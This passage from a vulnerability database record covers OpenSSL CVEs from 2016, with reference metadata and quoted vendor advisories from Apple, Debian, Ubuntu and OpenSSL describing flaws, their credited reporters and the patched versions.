0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4448" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4598" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1684" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4602" }, { "trust": 0.1, "url": "https://support.apple.com/kb/ht206900" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2176" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4594" }, { "trust": 0.1, "url": "https://access.redhat.com/articles/2688611" }, { "trust": 0.1, "url": "https://access.redhat.com/solutions/222023" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4459" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-4000" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-4000" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3195" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3183" }, { "trust": 0.1, "url": "https://access.redhat.com/documentation/en/jboss-enterprise-application-platform/" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-3110" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-4459" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-3195" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-3183" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-3110" }, { "trust": 0.1, "url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=appplatform\u0026downloadtype=securitypatches\u0026version=6.4" } ], "sources": [ { "db": "VULHUB", "id": "VHN-90924" }, { "db": "BID", "id": "89757" }, { "db": "JVNDB", "id": "JVNDB-2016-002472" }, { "db": "PACKETSTORM", "id": "136958" }, { "db": "PACKETSTORM", "id": "139167" }, { "db": "PACKETSTORM", "id": "137958" }, { "db": "PACKETSTORM", "id": "139116" }, { "db": "CNNVD", "id": "CNNVD-201605-081" }, { "db": "NVD", "id": "CVE-2016-2105" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULHUB", "id": "VHN-90924" }, { "db": "BID", "id": "89757" }, { "db": "JVNDB", "id": "JVNDB-2016-002472" }, { "db": "PACKETSTORM", "id": "136958" }, { "db": "PACKETSTORM", "id": "139167" }, { "db": "PACKETSTORM", "id": "137958" }, { "db": "PACKETSTORM", "id": "139116" }, { "db": "CNNVD", "id": "CNNVD-201605-081" }, { "db": "NVD", "id": "CVE-2016-2105" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-05-05T00:00:00", "db": "VULHUB", "id": "VHN-90924" }, { "date": "2016-05-03T00:00:00", "db": "BID", "id": "89757" }, { "date": "2016-05-10T00:00:00", "db": "JVNDB", "id": "JVNDB-2016-002472" }, { "date": "2016-05-10T17:01:56", "db": "PACKETSTORM", "id": "136958" }, { "date": "2016-10-18T13:58:46", "db": "PACKETSTORM", "id": "139167" }, { "date": "2016-07-19T19:45:20", "db": "PACKETSTORM", "id": "137958" }, { "date": "2016-10-12T23:44:55", "db": "PACKETSTORM", "id": "139116" }, { "date": "2016-05-04T00:00:00", "db": "CNNVD", "id": "CNNVD-201605-081" }, { "date": "2016-05-05T01:59:01.200000", "db": "NVD", "id": "CVE-2016-2105" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2022-12-13T00:00:00", "db": "VULHUB", "id": "VHN-90924" }, { "date": "2017-05-02T01:10:00", "db": "BID", "id": "89757" }, { "date": "2017-10-03T00:00:00", "db": "JVNDB", "id": "JVNDB-2016-002472" }, { "date": "2022-12-14T00:00:00", "db": "CNNVD", "id": "CNNVD-201605-081" }, { "date": "2023-11-07T02:30:55.583000", "db": "NVD", "id": "CVE-2016-2105" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201605-081" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "OpenSSL of crypto/evp/encode.c of EVP_EncodeUpdate Integer overflow vulnerability in functions", "sources": [ { "db": "JVNDB", "id": "JVNDB-2016-002472" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "input validation error", "sources": [ { "db": "CNNVD", "id": "CNNVD-201605-081" } ], "trust": 0.6 } }
var-201609-0348
Vulnerability from variot
Integer overflow in the MDC2_Update function in crypto/mdc2/mdc2dgst.c in OpenSSL before 1.1.0 allows remote attackers to cause a denial of service (out-of-bounds write and application crash) or possibly have unspecified other impact via unknown vectors. OpenSSL of crypto/mdc2/mdc2dgst.c of MDC2_Update The function contains an integer overflow vulnerability. Supplementary information : CWE Vulnerability type by CWE-787: Out-of-bounds Write ( Out-of-bounds writing ) Has been identified. http://cwe.mitre.org/data/definitions/787.htmlService disruption by a third party ( Out-of-bounds writes and application crashes ) There is a possibility of being affected unspecified, such as being in a state. OpenSSL is prone to an integer-overflow vulnerability. An attacker can exploit this issue to execute arbitrary code in the context of the user running the affected application. Failed exploit attempts will likely result in denial-of-service conditions. OpenSSL versions prior to 1.1.0 are affected. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512
APPLE-SA-2016-12-13-1 macOS 10.12.2
macOS 10.12.2 is now available and addresses the following:
apache_mod_php Available for: macOS Sierra 10.12.1 Impact: A remote attacker may cause an unexpected application termination or arbitrary code execution Description: Multiple issues existed in PHP before 5.6.26. These were addressed by updating PHP to version 5.6.26. CVE-2016-7411 CVE-2016-7412 CVE-2016-7413 CVE-2016-7414 CVE-2016-7416 CVE-2016-7417 CVE-2016-7418
AppleGraphicsPowerManagement Available for: macOS Sierra 10.12.1 Impact: A local user may be able to cause a system denial of service Description: A null pointer dereference was addressed through improved input validation. CVE-2016-7609: daybreaker@Minionz working with Trend Micro's Zero Day Initiative
Assets Available for: macOS Sierra 10.12.1 Impact: A local attacker may modify downloaded mobile assets Description: A permissions issue existed in mobile assets. This issue was addressed through improved access restrictions. CVE-2016-7628: an anonymous researcher
Audio Available for: macOS Sierra 10.12.1 Impact: Processing a maliciously crafted file may lead to arbitrary code execution Description: A memory corruption issue was addressed through improved input validation. CVE-2016-7658: Haohao Kong of Keen Lab (@keen_lab) of Tencent CVE-2016-7659: Haohao Kong of Keen Lab (@keen_lab) of Tencent
Bluetooth Available for: macOS Sierra 10.12.1, OS X El Capitan v10.11.6, and OS X Yosemite v10.10.5 Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed through improved memory handling. CVE-2016-7596: Pekka Oikarainen, Matias Karhumaa and Marko Laakso of Synopsys Software Integrity Group
Bluetooth Available for: macOS Sierra 10.12.1 Impact: An application may be able to cause a denial of service Description: A null pointer dereference was addressed through improved input validation. CVE-2016-7605: daybreaker of Minionz
Bluetooth Available for: macOS Sierra 10.12.1 Impact: An application may be able to execute arbitrary code with system privileges Description: A type confusion issue was addressed through improved memory handling. CVE-2016-7617: Radu Motspan working with Trend Micro's Zero Day Initiative, Ian Beer of Google Project Zero
CoreCapture Available for: macOS Sierra 10.12.1 and OS X El Capitan v10.11.6 Impact: A local user may be able to cause a system denial of service Description: A null pointer dereference was addressed through improved state management. CVE-2016-7604: daybreaker of Minionz
CoreFoundation Available for: macOS Sierra 10.12.1 Impact: Processing malicious strings may lead to an unexpected application termination or arbitrary code execution Description: A memory corruption issue existed in the processing of strings. This issue was addressed through improved bounds checking. CVE-2016-7663: an anonymous researcher
CoreGraphics Available for: macOS Sierra 10.12.1 Impact: Processing a maliciously crafted font file may lead to unexpected application termination Description: A null pointer dereference was addressed through improved input validation. CVE-2016-7627: TRAPMINE Inc. & Meysam Firouzi @R00tkitSMM
CoreMedia External Displays Available for: macOS Sierra 10.12.1 Impact: A local application may be able to execute arbitrary code in the context of the mediaserver daemon Description: A type confusion issue was addressed through improved memory handling. CVE-2016-7655: Keen Lab working with Trend Micro's Zero Day Initiative
CoreMedia Playback Available for: macOS Sierra 10.12.1 Impact: Processing a maliciously crafted .mp4 file may lead to arbitrary code execution Description: A memory corruption issue was addressed through improved memory handling. CVE-2016-7588: dragonltx of Huawei 2012 Laboratories
CoreStorage Available for: macOS Sierra 10.12.1 Impact: A local user may be able to cause a system denial of service Description: A null pointer dereference was addressed through improved input validation. CVE-2016-7603: daybreaker@Minionz working with Trend Micro's Zero Day Initiative
CoreText Available for: macOS Sierra 10.12.1 Impact: Processing a maliciously crafted font file may lead to arbitrary code execution Description: Multiple memory corruption issues existed in the handling of font files. These issues were addressed through improved bounds checking. CVE-2016-7595: riusksk(ae3aY=) of Tencent Security Platform Department
curl Available for: macOS Sierra 10.12.1 Impact: An attacker in a privileged network position may be able to leak sensitive user information Description: Multiple issues existed in curl. These issues were addressed by updating to curl version 7.51.0. CVE-2016-5419 CVE-2016-5420 CVE-2016-5421 CVE-2016-7141 CVE-2016-7167 CVE-2016-8615 CVE-2016-8616 CVE-2016-8617 CVE-2016-8618 CVE-2016-8619 CVE-2016-8620 CVE-2016-8621 CVE-2016-8622 CVE-2016-8623 CVE-2016-8624 CVE-2016-8625
Directory Services Available for: macOS Sierra 10.12.1 Impact: A local user may be able to gain root privileges Description: A use after free issue was addressed through improved memory management. CVE-2016-7633: Ian Beer of Google Project Zero
Disk Images Available for: macOS Sierra 10.12.1 Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed through improved input validation. CVE-2016-7616: daybreaker@Minionz working with Trend Micro's Zero Day Initiative
FontParser Available for: macOS Sierra 10.12.1 Impact: Processing a maliciously crafted font file may lead to arbitrary code execution Description: Multiple memory corruption issues existed in the handling of font files. These issues were addressed through improved bounds checking. CVE-2016-4691: riusksk(ae3aY=) of Tencent Security Platform Department
FontParser Available for: macOS Sierra 10.12.1 Impact: Processing a maliciously crafted font file may lead to arbitrary code execution Description: A buffer overflow existed in the handling of font files. This issue was addressed through improved bounds checking. CVE-2016-4688: Simon Huang of Alipay company, thelongestusernameofall@gmail.com
Foundation Available for: macOS Sierra 10.12.1 Impact: Opening a maliciously crafted .gcx file may lead to unexpected application termination or arbitrary code execution Description: A memory corruption issue was addressed through improved input validation. CVE-2016-7618: riusksk(ae3aY=) of Tencent Security Platform Department
Grapher Available for: macOS Sierra 10.12.1 Impact: Opening a maliciously crafted .gcx file may lead to unexpected application termination or arbitrary code execution Description: A memory corruption issue was addressed through improved input validation. CVE-2016-7622: riusksk(ae3aY=) of Tencent Security Platform Department
ICU Available for: macOS Sierra 10.12.1 Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A memory corruption issue was addressed through improved memory handling. CVE-2016-7594: AndrA(c) Bargull
ImageIO Available for: macOS Sierra 10.12.1 Impact: A remote attacker may be able to leak memory Description: An out-of-bounds read was addressed through improved bounds checking. CVE-2016-7643: Yangkang (@dnpushme) of Qihoo360 Qex Team
Intel Graphics Driver Available for: macOS Sierra 10.12.1 Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed through improved input validation. CVE-2016-7602: daybreaker@Minionz working with Trend Micro's Zero Day Initiative
IOAcceleratorFamily Available for: macOS Sierra 10.12.1 Impact: A local user may be able to determine kernel memory layout Description: A shared memory issue was addressed through improved memory handling. CVE-2016-7624 : Qidan He (@flanker_hqd) from KeenLab working with Trend Micro's Zero Day Initiative
IOFireWireFamily Available for: macOS Sierra 10.12.1 Impact: A local attacker may be able to read kernel memory Description: A memory corruption issue was addressed through improved memory handling. CVE-2016-7608: Brandon Azad
IOHIDFamily Available for: macOS Sierra 10.12.1 Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed through improved memory handling. CVE-2016-1823: Ian Beer of Google Project Zero
IOHIDFamily Available for: macOS Sierra 10.12.1 Impact: A local application with system privileges may be able to execute arbitrary code with kernel privileges Description: A use after free issue was addressed through improved memory management. CVE-2016-7591: daybreaker of Minionz
IOKit Available for: macOS Sierra 10.12.1 Impact: A local user may be able to determine kernel memory layout Description: A shared memory issue was addressed through improved memory handling. CVE-2016-7625: Qidan He (@flanker_hqd) from KeenLab working with Trend Micro's Zero Day Initiative
IOKit Available for: macOS Sierra 10.12.1 Impact: An application may be able to read kernel memory Description: A memory corruption issue was addressed through improved input validation. CVE-2016-7657: Keen Lab working with Trend Micro's Zero Day Initiative
IOSurface Available for: macOS Sierra 10.12.1 Impact: A local user may be able to determine kernel memory layout Description: A shared memory issue was addressed through improved memory handling. CVE-2016-7620: Qidan He (@flanker_hqd) from KeenLab working with Trend Micro's Zero Day Initiative
Kernel Available for: macOS Sierra 10.12.1 Impact: An application may be able to execute arbitrary code with kernel privileges Description: Multiple memory corruption issues were addressed through improved input validation. CVE-2016-7606: @cocoahuke, Chen Qin of Topsec Alpha Team (topsec.com) CVE-2016-7612: Ian Beer of Google Project Zero
Kernel Available for: macOS Sierra 10.12.1 Impact: An application may be able to read kernel memory Description: An insufficient initialization issue was addressed by properly initializing memory returned to user space. CVE-2016-7607: Brandon Azad
Kernel Available for: macOS Sierra 10.12.1 Impact: A local user may be able to cause a system denial of service Description: A denial of service issue was addressed through improved memory handling. CVE-2016-7615: The UK's National Cyber Security Centre (NCSC)
Kernel Available for: macOS Sierra 10.12.1 Impact: A local user may be able to cause an unexpected system termination or arbitrary code execution in the kernel Description: A use after free issue was addressed through improved memory management. CVE-2016-7621: Ian Beer of Google Project Zero
Kernel Available for: macOS Sierra 10.12.1 Impact: A local user may be able to gain root privileges Description: A memory corruption issue was addressed through improved input validation. CVE-2016-7637: Ian Beer of Google Project Zero
Kernel Available for: macOS Sierra 10.12.1 Impact: A local application with system privileges may be able to execute arbitrary code with kernel privileges Description: A use after free issue was addressed through improved memory management. CVE-2016-7644: Ian Beer of Google Project Zero
kext tools Available for: macOS Sierra 10.12.1 Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed through improved input validation. CVE-2016-7629: @cocoahuke
libarchive Available for: macOS Sierra 10.12.1 Impact: A local attacker may be able to overwrite existing files Description: A validation issue existed in the handling of symlinks. This issue was addressed through improved validation of symlinks. CVE-2016-7619: an anonymous researcher
LibreSSL Available for: macOS Sierra 10.12.1 and OS X El Capitan v10.11.6 Impact: An attacker with a privileged network position may be able to cause a denial of service Description: A denial of service issue in unbounded OCSP growth was addressed through improved memory handling. CVE-2016-6304
OpenLDAP Available for: macOS Sierra 10.12.1 Impact: An attacker may be able to exploit weaknesses in the RC4 cryptographic algorithm Description: RC4 was removed as a default cipher. CVE-2016-1777: Pepi Zawodsky
OpenPAM Available for: macOS Sierra 10.12.1 Impact: A local unprivileged user may gain access to privileged applications Description: PAM authentication within sandboxed applications failed insecurely. This was addressed with improved error handling. This issue was addressed through improved input validation. CVE-2016-6303
OpenSSL Available for: macOS Sierra 10.12.1 Impact: An attacker with a privileged network position may be able to cause a denial of service Description: A denial of service issue in unbounded OCSP growth was addressed through improved memory handling. CVE-2016-6304
Power Management Available for: macOS Sierra 10.12.1 Impact: A local user may be able to gain root privileges Description: An issue in mach port name references was addressed through improved validation. CVE-2016-7661: Ian Beer of Google Project Zero
Security Available for: macOS Sierra 10.12.1 Impact: An attacker may be able to exploit weaknesses in the 3DES cryptographic algorithm Description: 3DES was removed as a default cipher. CVE-2016-4693: GaA<<tan Leurent and Karthikeyan Bhargavan from INRIA Paris
Security Available for: macOS Sierra 10.12.1 Impact: An attacker in a privileged network position may be able to cause a denial of service Description: A validation issue existed in the handling of OCSP responder URLs. This issue was addressed by verifying OCSP revocation status after CA validation and limiting the number of OCSP requests per certificate. CVE-2016-7636: Maksymilian Arciemowicz (cxsecurity.com)
Security Available for: macOS Sierra 10.12.1 Impact: Certificates may be unexpectedly evaluated as trusted Description: A certificate evaluation issue existed in certificate validation. This issue was addressed through additional validation of certificates. CVE-2016-7662: Apple
syslog Available for: macOS Sierra 10.12.1 Impact: A local user may be able to gain root privileges Description: An issue in mach port name references was addressed through improved validation. CVE-2016-7660: Ian Beer of Google Project Zero
macOS 10.12.2 may be obtained from the Mac App Store or Apple's Software Downloads web site: https://www.apple.com/support/downloads/
Information will also be posted to the Apple Security Updates web site: https://support.apple.com/kb/HT201222
This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE----- Comment: GPGTools - https://gpgtools.org
iQIcBAEBCgAGBQJYT7LKAAoJEIOj74w0bLRGfKwQAN3nnwHgJNE+obIjTzpTHLlh mMQYstsO8Mcj4hjIgTCHuQr1tDldva0IZEivoYAbyXAgM9xKlIbpqBQ5TE94l3nl xTTeVqtozCCdRT36mphvwhPEp38lvclUU1IGxyvP6ieK0dHUKS8LhL9MpnaOinrX UhSiXkMs9tTZI5SgkumzBmg10oOwDnMvZDrwTcxe9vjU26V9S7+VpfsguefwDSLE fHYX4KksoEUZuDdUBrfX2+03QbqYxBjQR9IRdpcX56laq1TGUMTKwkTi9DxJlByP SJl3uvVhqWf1UkYH6x5N/gC9lXq5QO6L7W3W2rRqTtgr2UMPZsBuf0srK/lFmPvC c63thvcZyPk0cDcE7k0ZmlJx+7ihFIiPKdGwLoX5Rl6Zr29Wh9aGKhzUUYO12PUh +x18HRwXxvSv9TXAUYQu5hD48SuhUiMEBO8Qq7Z8XPFEUSJXY2AjGjai9mJYNfC4 OELKPPvYnNSd3m8YGvWY8gWgwyRP0es6U3d5rGatEpA1qcIFmUrHFhpvveL6SRSY xPQgjB/aohg/fDf3jDO1kjR7+v83B+ObbCr8MOgqGNtG3GqOimMOa8XuSMbV7+3u 0kivBY8fxYdBy0pXDdBgv+AHaTue+wgP5tQXFiAxm61Fv+uz/yvR22uaJ39P5cJf msyz+/zQNISkly6K0VBO =0QW0 -----END PGP SIGNATURE-----
. Additional information can be found at https://www.openssl.org/blog/blog/2016/06/27/undefined-pointer-arithmetic/
CVE-2016-2178
Cesar Pereida, Billy Brumley and Yuval Yarom discovered a timing
leak in the DSA code.
CVE-2016-2179 / CVE-2016-2181
Quan Luo and the OCAP audit team discovered denial of service
vulnerabilities in DTLS.
For the stable distribution (jessie), these problems have been fixed in version 1.0.1t-1+deb8u4.
For the unstable distribution (sid), these problems will be fixed soon. ========================================================================== Ubuntu Security Notice USN-3087-2 September 23, 2016
openssl regression
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 16.04 LTS
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
Summary:
USN-3087-1 introduced a regression in OpenSSL.
Software Description: - openssl: Secure Socket Layer (SSL) cryptographic library and tools
Details:
USN-3087-1 fixed vulnerabilities in OpenSSL. The fix for CVE-2016-2182 was incomplete and caused a regression when parsing certificates. This update fixes the problem.
We apologize for the inconvenience. (CVE-2016-6304) Guido Vranken discovered that OpenSSL used undefined behaviour when performing pointer arithmetic. (CVE-2016-2178) Quan Luo discovered that OpenSSL did not properly restrict the lifetime of queue entries in the DTLS implementation. (CVE-2016-2179) Shi Lei discovered that OpenSSL incorrectly handled memory in the TS_OBJ_print_bio() function. (CVE-2016-2180) It was discovered that the OpenSSL incorrectly handled the DTLS anti-replay feature. (CVE-2016-2181) Shi Lei discovered that OpenSSL incorrectly validated division results. (CVE-2016-2182) Karthik Bhargavan and Gaetan Leurent discovered that the DES and Triple DES ciphers were vulnerable to birthday attacks. A remote attacker could possibly use this flaw to obtain clear text data from long encrypted sessions. This update moves DES from the HIGH cipher list to MEDIUM. (CVE-2016-2183) Shi Lei discovered that OpenSSL incorrectly handled certain ticket lengths. (CVE-2016-6302) Shi Lei discovered that OpenSSL incorrectly handled memory in the MDC2_Update() function. (CVE-2016-6303) Shi Lei discovered that OpenSSL incorrectly performed certain message length checks. (CVE-2016-6306)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 16.04 LTS: libssl1.0.0 1.0.2g-1ubuntu4.5
Ubuntu 14.04 LTS: libssl1.0.0 1.0.1f-1ubuntu2.21
Ubuntu 12.04 LTS: libssl1.0.0 1.0.1-4ubuntu5.38
After a standard system update you need to reboot your computer to make all the necessary changes.
References: http://www.ubuntu.com/usn/usn-3087-2 http://www.ubuntu.com/usn/usn-3087-1 https://launchpad.net/bugs/1626883
Package Information: https://launchpad.net/ubuntu/+source/openssl/1.0.2g-1ubuntu4.5 https://launchpad.net/ubuntu/+source/openssl/1.0.1f-1ubuntu2.21 https://launchpad.net/ubuntu/+source/openssl/1.0.1-4ubuntu5.38
. OpenSSL Security Advisory [22 Sep 2016] ========================================
OCSP Status Request extension unbounded memory growth (CVE-2016-6304)
Severity: High
A malicious client can send an excessively large OCSP Status Request extension. If that client continually requests renegotiation, sending a large OCSP Status Request extension each time, then there will be unbounded memory growth on the server. This will eventually lead to a Denial Of Service attack through memory exhaustion. Servers with a default configuration are vulnerable even if they do not support OCSP. Builds using the "no-ocsp" build time option are not affected.
Servers using OpenSSL versions prior to 1.0.1g are not vulnerable in a default configuration, instead only if an application explicitly enables OCSP stapling support.
OpenSSL 1.1.0 users should upgrade to 1.1.0a OpenSSL 1.0.2 users should upgrade to 1.0.2i OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 29th August 2016 by Shi Lei (Gear Team, Qihoo 360 Inc.). The fix was developed by Matt Caswell of the OpenSSL development team.
SSL_peek() hang on empty record (CVE-2016-6305)
Severity: Moderate
OpenSSL 1.1.0 SSL/TLS will hang during a call to SSL_peek() if the peer sends an empty record. This could be exploited by a malicious peer in a Denial Of Service attack.
OpenSSL 1.1.0 users should upgrade to 1.1.0a
This issue was reported to OpenSSL on 10th September 2016 by Alex Gaynor. The fix was developed by Matt Caswell of the OpenSSL development team.
SWEET32 Mitigation (CVE-2016-2183)
Severity: Low
SWEET32 (https://sweet32.info) is an attack on older block cipher algorithms that use a block size of 64 bits. In mitigation for the SWEET32 attack DES based ciphersuites have been moved from the HIGH cipherstring group to MEDIUM in OpenSSL 1.0.1 and OpenSSL 1.0.2. OpenSSL 1.1.0 since release has had these ciphersuites disabled by default.
OpenSSL 1.0.2 users should upgrade to 1.0.2i OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 16th August 2016 by Karthikeyan Bhargavan and Gaetan Leurent (INRIA). The fix was developed by Rich Salz of the OpenSSL development team.
OOB write in MDC2_Update() (CVE-2016-6303)
Severity: Low
An overflow can occur in MDC2_Update() either if called directly or through the EVP_DigestUpdate() function using MDC2. If an attacker is able to supply very large amounts of input data after a previous call to EVP_EncryptUpdate() with a partial block then a length check can overflow resulting in a heap corruption.
The amount of data needed is comparable to SIZE_MAX which is impractical on most platforms.
OpenSSL 1.0.2 users should upgrade to 1.0.2i OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 11th August 2016 by Shi Lei (Gear Team, Qihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL development team.
Malformed SHA512 ticket DoS (CVE-2016-6302)
Severity: Low
If a server uses SHA512 for TLS session ticket HMAC it is vulnerable to a DoS attack where a malformed ticket will result in an OOB read which will ultimately crash.
The use of SHA512 in TLS session tickets is comparatively rare as it requires a custom server callback and ticket lookup mechanism.
OpenSSL 1.0.2 users should upgrade to 1.0.2i OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 19th August 2016 by Shi Lei (Gear Team, Qihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL development team.
OOB write in BN_bn2dec() (CVE-2016-2182)
Severity: Low
The function BN_bn2dec() does not check the return value of BN_div_word(). This can cause an OOB write if an application uses this function with an overly large BIGNUM. This could be a problem if an overly large certificate or CRL is printed out from an untrusted source. TLS is not affected because record limits will reject an oversized certificate before it is parsed.
OpenSSL 1.0.2 users should upgrade to 1.0.2i OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 2nd August 2016 by Shi Lei (Gear Team, Qihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL development team.
OOB read in TS_OBJ_print_bio() (CVE-2016-2180)
Severity: Low
The function TS_OBJ_print_bio() misuses OBJ_obj2txt(): the return value is the total length the OID text representation would use and not the amount of data written. This will result in OOB reads when large OIDs are presented.
OpenSSL 1.0.2 users should upgrade to 1.0.2i OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 21st July 2016 by Shi Lei (Gear Team, Qihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL development team.
Pointer arithmetic undefined behaviour (CVE-2016-2177)
Severity: Low
Avoid some undefined pointer arithmetic
A common idiom in the codebase is to check limits in the following manner: "p + len > limit"
Where "p" points to some malloc'd data of SIZE bytes and limit == p + SIZE
"len" here could be from some externally supplied data (e.g. from a TLS message).
The rules of C pointer arithmetic are such that "p + len" is only well defined where len <= SIZE. Therefore the above idiom is actually undefined behaviour.
For example this could cause problems if some malloc implementation provides an address for "p" such that "p + len" actually overflows for values of len that are too big and therefore p + len < limit.
OpenSSL 1.0.2 users should upgrade to 1.0.2i OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 4th May 2016 by Guido Vranken. The fix was developed by Matt Caswell of the OpenSSL development team.
Constant time flag not preserved in DSA signing (CVE-2016-2178)
Severity: Low
Operations in the DSA signing algorithm should run in constant time in order to avoid side channel attacks. A flaw in the OpenSSL DSA implementation means that a non-constant time codepath is followed for certain operations. This has been demonstrated through a cache-timing attack to be sufficient for an attacker to recover the private DSA key.
OpenSSL 1.0.2 users should upgrade to 1.0.2i OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 23rd May 2016 by César Pereida (Aalto University), Billy Brumley (Tampere University of Technology), and Yuval Yarom (The University of Adelaide and NICTA). The fix was developed by César Pereida.
DTLS buffered message DoS (CVE-2016-2179)
Severity: Low
In a DTLS connection where handshake messages are delivered out-of-order those messages that OpenSSL is not yet ready to process will be buffered for later use. Under certain circumstances, a flaw in the logic means that those messages do not get removed from the buffer even though the handshake has been completed. An attacker could force up to approx. 15 messages to remain in the buffer when they are no longer required. These messages will be cleared when the DTLS connection is closed. The default maximum size for a message is 100k. Therefore the attacker could force an additional 1500k to be consumed per connection. By opening many simulataneous connections an attacker could cause a DoS attack through memory exhaustion.
OpenSSL 1.0.2 DTLS users should upgrade to 1.0.2i OpenSSL 1.0.1 DTLS users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 22nd June 2016 by Quan Luo. The fix was developed by Matt Caswell of the OpenSSL development team.
DTLS replay protection DoS (CVE-2016-2181)
Severity: Low
A flaw in the DTLS replay attack protection mechanism means that records that arrive for future epochs update the replay protection "window" before the MAC for the record has been validated. This could be exploited by an attacker by sending a record for the next epoch (which does not have to decrypt or have a valid MAC), with a very large sequence number. This means that all subsequent legitimate packets are dropped causing a denial of service for a specific DTLS connection.
OpenSSL 1.0.2 DTLS users should upgrade to 1.0.2i OpenSSL 1.0.1 DTLS users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 21st November 2015 by the OCAP audit team. The fix was developed by Matt Caswell of the OpenSSL development team.
Certificate message OOB reads (CVE-2016-6306)
Severity: Low
In OpenSSL 1.0.2 and earlier some missing message length checks can result in OOB reads of up to 2 bytes beyond an allocated buffer. There is a theoretical DoS risk but this has not been observed in practice on common platforms.
The messages affected are client certificate, client certificate request and server certificate. As a result the attack can only be performed against a client or a server which enables client authentication.
OpenSSL 1.0.2 users should upgrade to 1.0.2i OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 22nd August 2016 by Shi Lei (Gear Team, Qihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL development team.
Excessive allocation of memory in tls_get_message_header() (CVE-2016-6307)
Severity: Low
A TLS message includes 3 bytes for its length in the header for the message. This would allow for messages up to 16Mb in length. Messages of this length are excessive and OpenSSL includes a check to ensure that a peer is sending reasonably sized messages in order to avoid too much memory being consumed to service a connection. A flaw in the logic of version 1.1.0 means that memory for the message is allocated too early, prior to the excessive message length check. Due to way memory is allocated in OpenSSL this could mean an attacker could force up to 21Mb to be allocated to service a connection. This could lead to a Denial of Service through memory exhaustion. However, the excessive message length check still takes place, and this would cause the connection to immediately fail. Assuming that the application calls SSL_free() on the failed conneciton in a timely manner then the 21Mb of allocated memory will then be immediately freed again. Therefore the excessive memory allocation will be transitory in nature. This then means that there is only a security impact if:
1) The application does not call SSL_free() in a timely manner in the event that the connection fails or 2) The application is working in a constrained environment where there is very little free memory or 3) The attacker initiates multiple connection attempts such that there are multiple connections in a state where memory has been allocated for the connection; SSL_free() has not yet been called; and there is insufficient memory to service the multiple requests.
Except in the instance of (1) above any Denial Of Service is likely to be transitory because as soon as the connection fails the memory is subsequently freed again in the SSL_free() call. However there is an increased risk during this period of application crashes due to the lack of memory - which would then mean a more serious Denial of Service.
This issue does not affect DTLS users.
OpenSSL 1.1.0 TLS users should upgrade to 1.1.0a
This issue was reported to OpenSSL on 18th September 2016 by Shi Lei (Gear Team, Qihoo 360 Inc.). The fix was developed by Matt Caswell of the OpenSSL development team.
